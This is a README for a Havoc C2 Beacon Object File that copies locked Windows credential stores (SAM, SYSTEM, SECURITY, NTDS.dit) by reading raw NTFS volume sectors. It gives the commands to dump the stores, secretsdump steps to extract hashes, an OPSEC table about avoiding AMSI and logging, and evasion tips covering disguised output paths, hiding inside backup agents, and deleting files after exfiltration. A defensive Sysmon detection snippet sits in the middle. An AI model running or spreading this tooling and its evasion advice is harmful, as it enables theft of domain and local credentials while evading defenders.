Beacon Object File (BOF) for Havoc that copies locked/in-use system files (registry hives, NTDS.dit, etc.) by parsing the NTFS MFT and reading raw volume sectors, without using VSS, Registry APIs, or standard file I/O.
This is a port of kfallahi's UnderlayCopy PowerShell script (MFT mode) to a native BOF, removing the PowerShell dependency and significantly reducing the detection surface.
- Enables `SeBackupPrivilege` on the current token via `NtAdjustPrivilegesToken`
- Retrieves the MFT record number of the target file via `GetFileInformationByHandle`
- Opens the volume `\\.\C:` with synchronous `GENERIC_READ`
- Reads the NTFS boot sector to obtain `clusterSize` and the `$MFT` offset
- Reads `$MFT` record 0 and parses its data runs (the MFT is not contiguous on disk)
- Translates the target MFT record number to a real LCN using the `$MFT` run map
- Reads the target file's MFT record and parses its `$DATA` attribute and data runs
- Reads raw clusters from disk and writes them to the destination file
- Local Administrator (elevated) — SYSTEM is not required
- `SeBackupPrivilege` available in the token (default for elevated processes)
- NTFS volume (not FAT32 or ReFS)
- Havoc C2 framework
UnderlayCopy_bof/
├── Underlay_bof.c # BOF source code
├── Underlay_bof.py # Havoc command registration script
├── Makefile # Cross-compilation with mingw-w64
├── beacon.h # Havoc BOF API header
└── README.md
# Requirements: mingw-w64
sudo apt install mingw-w64
# Compile
make clean && make
# Output: Underlay_bof.o
Compiler: x86_64-w64-mingw32-gcc
Notable flags:
- `-fno-asynchronous-unwind-tables` — removes the `.eh_frame` section
- `-fno-ident` — removes compiler metadata
- `-Os` — optimize for size
Load the script in Havoc:
Script Manager → Load → Underlay_bof.py
Run from the agent console:
stealthcopy <source> <destination>
# Dump local account hashes
stealthcopy C:\Windows\System32\config\SAM C:\Temp\out.sam
stealthcopy C:\Windows\System32\config\SYSTEM C:\Temp\out.system
stealthcopy C:\Windows\System32\config\SECURITY C:\Temp\out.security
# Dump Active Directory database (on a DC)
stealthcopy C:\Windows\NTDS\NTDS.dit C:\Temp\out.dit
# Local accounts
secretsdump.py -sam out.sam -system out.system -security out.security LOCAL
# Domain accounts (NTDS)
secretsdump.py -ntds out.dit -system out.system LOCAL
✅ = better for OPSEC (stealthier / fewer privileges)
❌ = worse for OPSEC (more detectable / more intrusive)
⚠️ = noisy behavior but required
| Artifact | PS1 (kfallahi) | This BOF ⭐️ |
|---|---|---|
| AMSI scan | ❌ detectable | ✅ stealth |
| ScriptBlock Logging (EID 4104) | ❌ detectable | ✅ stealth |
| powershell.exe process | ❌ visible | ✅ no PS |
| Registry APIs (RegSaveKeyEx) | ✅ safe | ✅ safe |
| Raw volume read (\\.\C:) | | |
| Requires SYSTEM | ✅ no | ✅ no |
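The raw volume read the BOF performs is the artifact a defender can key on. As an added example that is not part of this repository, the following Python flags Sysmon RawAccessRead (Event ID 9) events from images outside a backup-software allowlist and raises the severity when the same process enabled `SeBackupPrivilege` shortly before (Security Event ID 4703); the allowlist, the simplified field names and the sample events are constructed for the illustration.

```python
"""Flag raw volume reads (Sysmon EID 9) by non-backup processes and correlate
them with a preceding SeBackupPrivilege enable (Security EID 4703).
Field names are simplified and all events below are constructed samples."""
from datetime import datetime, timedelta

# Hypothetical allowlist: replace with the backup agents actually deployed.
BACKUP_IMAGES = {
    r"c:\windows\system32\wbengine.exe",
    r"c:\program files\veeam\backup\veeamagent.exe",
}


def _ts(value):
    return datetime.fromisoformat(value)


def find_raw_volume_reads(events, window=timedelta(minutes=5)):
    """Return one alert per EID 9 event whose image is not an allowed backup
    binary. Severity is 'high' when the same PID enabled SeBackupPrivilege
    within `window` before the raw read, otherwise 'medium'."""
    priv_enables = [(_ts(e["time"]), e["pid"]) for e in events
                    if e["eid"] == 4703 and "SeBackupPrivilege" in e.get("enabled", "")]
    alerts = []
    for e in events:
        if e["eid"] != 9 or e["image"].lower() in BACKUP_IMAGES:
            continue
        t = _ts(e["time"])
        correlated = any(pid == e["pid"] and t - window <= pt <= t
                         for pt, pid in priv_enables)
        alerts.append({"pid": e["pid"], "image": e["image"], "device": e["device"],
                       "severity": "high" if correlated else "medium"})
    return alerts


# Constructed sample telemetry (not real logs). Sysmon reports the device either
# as the DOS name (\\.\C:) or as the kernel object (\Device\HarddiskVolumeN).
SAMPLE_EVENTS = [
    {"eid": 4703, "time": "2024-06-01T10:00:00", "pid": 4120,
     "enabled": "SeBackupPrivilege"},
    {"eid": 9, "time": "2024-06-01T10:00:03", "pid": 4120,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\update.exe", "device": r"\\.\C:"},
    {"eid": 9, "time": "2024-06-01T10:02:00", "pid": 880,
     "image": r"C:\Windows\System32\wbengine.exe", "device": r"\Device\HarddiskVolume3"},
    {"eid": 9, "time": "2024-06-01T10:05:00", "pid": 5555,
     "image": r"C:\tools\diskinfo.exe", "device": r"\\.\PhysicalDrive0"},
]

if __name__ == "__main__":
    for alert in find_raw_volume_reads(SAMPLE_EVENTS):
        print(alert)
```

Run against the samples, the allowlisted wbengine.exe read is ignored, the Temp-directory binary that enabled the privilege three seconds earlier is rated high, and the unallowlisted disk tool is rated medium for triage.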
Destination path — avoid obvious locations:
# Bad
C:\Temp\SAM
# Better
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\<guid>.tmp
Execution context — running from a process that legitimately performs backup I/O (e.g. a backup agent running as SYSTEM) makes the pattern indistinguishable from normal activity.
Clean up — delete the output file after exfiltration:
stealthcopy C:\Windows\System32\config\SAM C:\Temp\out.tmp
download C:\Temp\out.tmp
shell del /f C:\Temp\out.tmp
Credential Guard protects in-memory credentials in lsass.exe. It has no effect on filesystem-level access — this technique reads files from disk and is not affected by Credential Guard.
- Volume hardcoded to `C:` — modify `vol[]` in the source for other drive letters
- Does not support Alternate Data Streams (ADS)
- MFT record size assumed to be 1024 bytes (standard on all modern NTFS volumes)
- Does not apply MFT fixups (Update Sequence Array) — works correctly in practice but may fail on heavily fragmented records
Based on UnderlayCopy by @kfallahi — MFT mode ported to a Havoc BOF.